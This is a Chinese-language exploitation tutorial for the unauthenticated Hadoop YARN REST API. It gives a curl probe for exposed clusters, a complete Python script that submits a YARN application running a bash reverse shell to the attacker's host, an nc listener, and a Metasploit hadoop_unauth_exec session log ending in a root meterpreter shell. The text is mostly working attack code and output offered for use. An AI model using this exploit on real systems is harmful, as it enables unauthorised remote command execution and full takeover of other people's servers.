Hadoop Yarn REST API未授权漏洞利用
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARN是hadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令。
yarn默认开发8088和8089端口。
检测漏洞存在方式:
curl -X POST 172.16.20.134:8088/ws/v1/cluster/apps/new-application
返回如下请求证明存在
漏洞利用python代码 :
import requests
target = 'http://172.16.20.134:8088/'
lhost = '172.16.20.108' # put your local host ip here, and listen at port 9999
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
print(resp.text)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
print (data)
requests.post(url, json=data)
本地监听,返回shell
nc -lvp 9999
msf漏洞模块
msf5 > use exploit/linux/http/hadoop_unauth_exec msf5 exploit(linux/http/hadoop_unauth_exec) > show options Module options (exploit/linux/http/hadoop_unauth_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 8088 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141 rhost => 192.168.77.141 msf5 exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp msf5 exploit(linux/http/hadoop_unauth_exec) > show options Module options (exploit/linux/http/hadoop_unauth_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.77.141 yes The target address RPORT 8088 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (linux/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141 lhost => 192.168.77.141 msf5 exploit(linux/http/hadoop_unauth_exec) > exploit [*] Started reverse TCP handler on 192.168.77.141:4444 [*] Sending Command [*] Command Stager progress - 100.00% done (763/763 bytes) [*] Sending stage (853256 bytes) to 172.20.0.3 [*] Meterpreter session 1 opened (192.168.77.141:4444 -> 172.20.0.3:34138) at 2018-05-15 03:21:17 -0400 meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0